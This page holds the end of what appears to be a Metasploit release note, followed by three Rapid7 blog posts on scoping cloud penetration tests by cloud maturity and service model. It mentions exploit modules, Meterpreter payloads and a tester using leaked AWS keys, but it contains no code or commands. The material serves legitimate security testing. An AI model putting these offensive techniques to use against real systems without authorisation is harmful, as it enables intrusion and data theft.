  • #16401 from space-r7 – This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Catalina all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, we’ve introduced a new CVE option to select which CVE to exploit. This default is the most recent CVE.

Enhancements and features (4)

  • #15972 from sempervictus – This updates the Log4shell scanner with the LEAK_PARAMS option, providing a way to leak more target information such as environment variables.
  • #16320 from dwelch-r7 – This updates Windows Meterpreter payloads to support a new MeterpreterDebugBuild datastore option. When set to true the generated payload will have additional logging support which is visible via Window’s DbgView program.
  • #16373 from adfoster-r7 – Adds initial support for Ruby 3.1
  • #16403 from sempervictus – This adds more checks to the post/windows/gather/checkvm module to better detect if the current target is a Qemu / KVM virtual machine.

Bugs fixed (3)

  • #16398 from jmartin-r7 – A number of recent payload adds did not conform to the patterns used for suggesting spec configurations. Tests for these payloads have now been manually added to ensure they will be appropriately tested as part of rspec checks.
  • #16408 from rtpt-alexanderneumann – This fixes an edge case with the multi/postgres/postgres_copy_from_program_cmd_exec module, which crashed when the randomly generated table name started with a number
  • #16419 from adfoster-r7 – A bug has been fixed whereby when using the search command and searching by disclosure_date, the help menu would instead appear. This has been remedied by improving the date handling logic for the search command.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Cloud Pentesting, Pt. 3: The Impact of Ecosystem Maturity

Post Syndicated from Eric Mortaro original https://blog.rapid7.com/2022/04/04/cloud-pentesting-pt-3-the-impact-of-ecosystem-maturity/

Cloud Pentesting, Pt. 3: The Impact of Ecosystem Maturity

Now that we’ve covered the basics of cloud pentesting and the style in which a cloud environment could be attacked, let’s turn our attention to the entirety of this ecosystem. This environment isn’t too different from the on-premise ecosystem that traditional penetration testing is performed on. Who doesn’t want to gain internal access to the client’s environment from an external perspective? Recently, one consultant obtained firewall access due to default credentials never being changed, and the management interface was being publicly exposed. Or how about gaining a shell on a web server because of misconfigurations?  

Typically, a client who has a bit more maturity beyond just a vulnerability management program will shift gears to doing multiple pentests against their environments, which are external, internal, web app, mobile app, wireless, and potentially more. By doing these types of pentests, clients can better understand which aspects of their ecosystem are failing and which are doing fine. This is no different than when their infrastructure is deployed in the cloud.

Cloud implementation maturity

There’s an old saying that one must learn how to crawl before walking and how to walk before running. That same adage runs true for pentesting. Pentesting a network before ever having some sort of vulnerability management program can certainly show the weaknesses within the network, but it may not show the true depth of the issue.

The same holds true with Red Teams. You wouldn’t want to immediately jump on the Red Team pentesting bandwagon without having gone through multiple iterations of pentesting to true up gaps within the environment. Cloud pentesting should be treated in the same manner.  

The maturity of a company’s cloud implementation will help determine the depth in which a cloud pentest can occur, if it can occur at all! To peel this orange back a bit, let’s say a company wants a cloud ecosystem pentest. Discovery calls to scope the project will certainly help uncover how a customer implements their cloud environment, but what if it’s a basic approach? As in, there is no use of cloud-native deployments, all user accounts have root access, tagging of assets within the environment is not implemented, and so on. Where does this leave a pentest?  

In this particular case, an ecosystem pentest is not feasible at this juncture. The more basic approaches, such as vulnerability management or scanning of built-in cloud vendor-specific checks, would most certainly be ideal. Again, crawl before you walk, and walk before you run.This would look more like a traditional pentest, where an external and an internal test are performed.

What if the client is very mature in their implementation of cloud? Now we’re talking! User accounts are not root, IAM roles are leveraged instead of users, departments have separate permission profiles, the environment utilizes cloud native deployments as much as possible, and there’s separation of department environments by means of accounts, access control lists (ACLs), or virtual private clouds (VPCs). This now becomes the cloud ecosystem pentest that will show gaps within the environment — with the understanding that the customer has implemented, to the best of their abilities, controls that are baked into the cloud platform.

Maturity example

I’ve had the absolute pleasure of chatting with a ton of potential customers that are interested in performing a cloud ecosystem pentest. This not only helps to understand how the customer needs their pentest to be structured, but it also helps me to understand how we can improve our offering at Rapid7. There’s one particular case that stood out to me, which helped me understand that some customers are simply not ready to move into a cloud-native deployment.  

In discussing Rapid7’s approach to cloud ecosystem pentesting, we typically ask what types of services the customer uses with their respective cloud vendor. In this discussion with this particular customer, we discovered they were using Kubernetes (K8s) quite extensively. After we asked a few more questions, it turned out that the customer wasn’t using K8s from a cloud-native perspective — rather, they had installed Kubernetes on their own virtual machines and were administering it from there. The reason behind this was that they just weren’t ready yet to fully transition to a cloud vendor running other parts of their infrastructure.  

Now, this is a bit of a head-scratcher, because in this type of scenario, they’re taking on more of the support than is necessary. Who am I to argue, though?  The customer and I had a very fruitful conversation, which actually led us both to a deeper understanding of not only their business approach but also their IT infrastructure strategy.

So, in this particular instance, if we were to pentest K8s that this customer deployed onto their virtual machines, how far could we go? Well, since they own the entire stack — from the operating system, to the software, to the actual containers — we can go as far as we can go. If, however, this had been deployed from a cloud-native perspective, we would have restrictions due to the cloud vendor’s terms of services.

One major restriction is container escapes, which are out of scope. This goes back to the shared environment that has made cloud so successful. If Rapid7 were capable of performing a container escape, not only would this have been severely out of scope, but Rapid7 would most certainly be reporting the exploit to the cloud vendor themselves. These are the dreams of a white hat hacker, who signed up to perform a bug bounty and get paid out potentially tens of thousands of dollars!

But while that isn’t exactly how all cloud pentests turn out, they can still be done just as effectively as traditional on-premise pentests. It just requires a clear understanding of how the customer has deployed their cloud ecosystem, how mature their implementation is, and what is in and out of scope for a pentest based on those factors.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Cloud Pentesting, Pt. 2: Testing Across Different Deployments

Post Syndicated from Eric Mortaro original https://blog.rapid7.com/2022/03/29/cloud-pentesting-pt-2-testing-across-different-deployments/

Cloud Pentesting, Pt. 2: Testing Across Different Deployments

In part one of this series, we broke down the various types of cloud deployments. So, pentesting in the cloud is just like on-prem, right? (Who asks these loaded questions!?)  

The answer is yes and no. It depends on how a customer has set up their cloud deployment. Let’s cover a few basics first, because this will really clear things up.

Each cloud vendor has their own unique restrictions on what can and cannot be attacked, due to the nature of how the cloud is architected. Most have very similar restrictions — however, these rules must be followed, or one could quickly find themselves outside of scope. The next sections will outline which parts of the “as-a-service” components are out of scope for testing, and which are in scope.

Infrastructure as a service

This, in my experience, is how most clients have come to set up their cloud deployment. This as-a-service model could have simply been the quickest way to appease a C-level person, asking their Directors and Managers to go all-in with cloud. This is that direct lift from on-premise to the cloud that we discussed in the last post.  

When it comes to testing this type of deployment, the scope is the largest it could be, with very few exceptions to what is out of scope. Getting dropped directly into a virtual private cloud (VPC) is likely the scenario that will work as an “assumed breach” approach. The client would then deploy a virtual machine, which will then be allowed specific access inbound from a tester’s IP address, along with gaining that access via an SSH keypair.  

Some exceptions to this testing that are OUT of scope include:

  • Auto-scaling functions and network address translation (NAT) gateways
  • Exploiting the software that was used to deploy compute instances, or changing NAT

Some items that are IN scope for this deployment model include:

  • Attacking the operating system and attempting exploitation against outdated versions
  • Exploiting the software or applications installed on the operating system

Platform as a service

You’ve heard of bring your own device (BYOD) — think of this as BYOS, or bring your own software. Platform as a service (PaaS) brings us up a level in terms of support requirements. With this approach, clients can utilize a cloud provider’s products that allow a client to bring their own code for things like web applications. A client no longer has to work on keeping their operating system up to date. The code is typically deployed on something like a container, which could cost the client much less than that of having to deploy a virtual machine, licensing for an operating system, vulnerability management of the operating system, and staffing considerations. There are again exceptions, however, to what can and can’t be tested.  

In this example, the following would be considered OUT of scope:

  • The host itself and/or containers hosting the application
  • Attempting to escape containers where the application is hosted

The items which are IN scope for this deployment model include:

  • Attempting to exploit the application that is installed on the operating system itself

Software as a service

At last, the greatest reduction in liability: software as a service (SaaS). Microsoft’s Office 365 is perhaps the most common example of a very widely used SaaS deployment. Click a few buttons in a cloud provider’s dashboard, input some user credentials, upload some data, and you’re done! Easy like Sunday morning!  

Now, the only thing to worry about is the data within the application and the users themselves.  Everything else — including virtual machine deployment, operating system installation and upkeep, patch management of the operation system and the software installed on it, and the code base, to name a few  — is completely removed from worry. Imagine how much overhead you can now dedicate to other parts of the business. Windows Admins, web app developers, infosec staff, and even IT staff now have less to worry about. However, if you’re looking to have a pentest in this kind of environment, just know that there is not a whole lot that can actually be done.  

Application exploits, for example, are OUT of scope. The items that are IN scope for this deployment model are the following:

  • Leveraging privileges and attempting to acquire data
  • Adding user accounts or elevating privileges

That’s it! The only thing that can be attacked is the users themselves, via password attacks, or the data that is held within the application — but that’s only if authentication is bypassed.

Those above examples are not made up from Rapid7’s perspective either.  These are industry-wide standards that cloud providers have created. These types of deployments are specifically designed to help reduce liability and to increase not only the capabilities of an organization but also its speed. These are known as a “shared platform” model.

As-a-service example

Recently, we had a discussion with a client who needed a pentest performed on their web application. Their web app was deployed from a third-party cloud provider, which ended up using Google Cloud Platform on their back end. After a consultant discovered that this client had deployed their web application via the SaaS model, I explained that, due to the SaaS deployment, application exploitation was out of scope, and the only attempts that could be made would be password attacks and to go after the data.

Now, obviously, education needs to happen all around, but again, the cloud isn’t new. After about an hour of discussing how their deployment looked, the client then asked a very interesting question: “How can I get to the point where we make the application available to fully attempt exploitation against it?” I was befuddled, and quite simply, the answer was, “Why would you want to do that?” You see, by using SaaS, you remove liability from worrying about this sort of issue, which the organization may not have the capacity or budget to address. SaaS is click-and-go, and the software provider is now at risk of not providing a secured platform for content delivery.  

After I had explained this to the client, they quickly understood that SaaS is the way to go, and transforming into a PaaS deployment model would have actually required that they now hire additional headcount, including a web app developer.

It is this maturity that needs to happen throughout the industry to continue to maintain security within not just small companies, but large enterprises, too.

Digging deeper

Externally

There’ve been numerous breaches of customer data, and there’s typically a common culprit: a misconfigured S3 bucket, or discovered credentials to a cloud vendor’s platform dashboard.  These all seem like very easy things to remedy, but performing an external pentest where the targets are the assets hosted by a cloud vendor will certainly show if there are misconfigurations or accidental access being provided. This can be treated like any normal external pentest, but with the sole focus on knowing these assets live within a cloud environment.

Internally

There are multiple considerations when discussing what is “internal” to a cloud environment. Here, we’ll dig into the differences between platform and infrastructure.

Platform vs. infrastructure

In order to move or create assets within a cloud environment, one must first set up an account with the cloud vendor of choice. A username and password are created, then a user logs into the web application dashboard of the cloud vendor, and finally, assets are created and deployed to provide the functionality that is needed. The platform that the user is logged into is one aspect of an “internal” pentest against a cloud environment.  

Platform pentest example

There I was, doing a thick client pentest against an executable. I installed the application on my Windows VM, started up a few more apps to hook into the running processes, and off to the races I went.

One of the more basic steps in the process is to check the installation files. Within the directory, I find an .INI file. I opened this file with a text editor, and I was greeted with an Amazon AWS Access Key ID and SecretAccessKey! Wow, did I get lucky. I fired up aws cli, punched in the access key ID and SecretAccessKey, along with the target IP address, and bam! I was in like Flynn.

Now, kudos go out to the client that didn’t provide this user with root access. However, I was still able to gain a ton of access with additional information. I stopped from there though, because this quickly turned into a cloud-style pentest. I called the client up right away and informed them of this information, and they were happy (not happy) that this was discovered.

Internal platform pentest

A platform pentest is like being given a domain account, in an assumed-breached scenario, on an internal pentest. It’s a “hey, if you can’t get creds, here’s a low-priv account to see what you can do with it” approach.

On a cloud platform pentest, we’re being given this account to attempt additional attacks, such as privilege escalation, launching of additional virtual machines, or using a function to inject code into containers that auto-deploy and dial back to a listening server each time. A virtual machine, preferably Kali Linux, will need to be deployed within the VPC, so you can perform your internal pentest from it.

Internal infrastructure pentest

This pentest is much easier to construct. It looks very similar to an internal, on-premise pentest. The client sets up a virtual machine inside of the VPC they want tested, then the consultant creates that public/private SSH keypair and provides the SSH public key to the client. The client allows specific source IPs to SSH into that VM, and the pentest begins.  

In my experience, a lot of clients only have one VPC, so that makes life a bit easier. However, as more and more people gain experience and knowledge with how to set up their cloud environments, VPC separation is becoming more prevalent. As an example, perhaps a customer utilizes functions to auto-deploy new “sites” each time one of their customers signs on to use their services. This function automatically creates a brand-new VPC, with separation from other VPCs (which are their other clients), virtual machines, databases, network connectivity, access into the VPC for their clients administration, user accounts, authentication, SSO, and more. In this scenario, we’d ask the client to create multiple VPCs and drop us into at least one of them. This way, we can then perform a tenant-to-tenant-style pentest, to see if it’s possible to break out of one segment to access another.

In part three, we’ll take a look at how the maturity of the client’s cloud implementation can impact the way pentests are carried out. Stay tuned!

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Cloud Pentesting, Pt. 1: Breaking Down the Basics

Post Syndicated from Eric Mortaro original https://blog.rapid7.com/2022/03/21/cloud-pentesting-pt-1-breaking-down-the-basics/

Cloud Pentesting, Pt. 1: Breaking Down the Basics

The concept of cloud computing has been around for awhile, but it seems like as of late — at least in the penetration testing field — more and more customers are looking to get a pentest done in their cloud deployment. What does that mean? How does that look? What can be tested, and what’s out of scope? Why would I want a pentest in the cloud? Let’s start with the basics here, to hopefully shed some light on what this is all about, and then we’ll get into the thick of it.

Cloud computing is the idea of using software and services that run on the internet as a way for an organization to deploy their once on-premise systems. This isn’t a new concept — in fact, the major vendors, such as Amazon’s AWS, Microsoft’s Azure, and Google’s Cloud Platform, have all been around for about 15 years. Still, cloud sometimes seems like it’s being talked about as if it was invented just yesterday, but we’ll get into that a bit more later.

So, cloud computing means using someone else’s computer, in a figurative or quite literal sense. Simple enough, right?  

Wrong! There are various ways that companies have started to utilize cloud providers, and these all impact how pentests are carried out in cloud environments. Let’s take a closer look at the three primary cloud configurations.

Traditional cloud usage

Some companies have simply lifted infrastructure and services straight from their own on-premise data centers and moved them into the cloud. This looks a whole lot like setting up one virtual private cloud (VPC), with numerous virtual machines, a flat network, and that’s it! While this might not seem like a company is using their cloud vendor to its fullest potential, they’re still reaping the benefits of never having to manage uptime of physical hardware, calling their ISP late at night because of an outage, or worrying about power outages or cooling.

But one inherent problem remains: The company still requires significant staff to maintain the virtual machines and perform operating system updates, software versioning, cipher suite usage, code base fixes, and more. This starts to look a lot like the typical vulnerability management (VM) program, where IT and security continue to own and maintain infrastructure. They work to patch and harden endpoints in the cloud and are still in line for changes to be committed to the cloud infrastructure.

Cloud-native usage

The other side of cloud adoption is a more mature approach, where a company has devoted time and effort toward transitioning their once on-premise infrastructure to a fully utilized cloud deployment. While this could very well include the use of the typical VPC, network stack, virtual machines, and more, the more mature organization will utilize cloud-native deployments. These could include storage services such as S3, function services, or even cloud-native Kubernetes.

Cloud-native users shift the priorities and responsibilities of IT and security teams so that they no longer act as gatekeepers to prevent the scaling up or out of infrastructure utilized by product teams. In most of these environments, the product teams own the ability to make commitments in the cloud without IT and security input. Meanwhile, IT and security focus on proper controls and configurations to prevent security incidents. Patching is exchanged for rebuilds, and network alerting and physical server isolation are handled through automated responses, such as an alert with AWS Config that automatically changes the security group for a resource in the cloud and isolates it for further investigation.

These types of deployments start to more fully utilize the capabilities of the cloud, such as automated deployment through infrastructure-as-code solutions like AWS Cloud Formation. Gone are the days when an organization would deploy Kubernetes on top of a virtual machine to deploy containers. Now, cloud-native vendors provide this service with AWS’s Elastic Kubernetes Services, Microsoft’s Azure Kubernetes Services, and for obvious reasons, Google’s Kubernetes Engine. These and other types of cloud native deployments really help to ease the burden on the organization.

Hybrid cloud

Then there’s hybrid cloud. This is where a customer can set up their on-premise environment to also tie into their cloud environment, or visa versa. One common theme we see is with Microsoft Azure, where the Azure AD Connect sync is used to synchronize on-premise Active Directory to Azure AD. This can be very beneficial when the company is using other Software-as-a-Service (SaaS) components, such as Microsoft Office 365.  

There are various benefits to utilizing hybrid cloud deployments. Maybe there are specific components that a customer wants to keep in house and support on their own infrastructure. Or perhaps the customer doesn’t yet have experience with how to maintain Kubernetes but is utilizing Google Cloud Platform. The ability to deploy your own services is the key to flexibility, and the cloud helps provide that.

In part two, we’ll take a closer look at how these different cloud deployments impact pentesting in the cloud.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.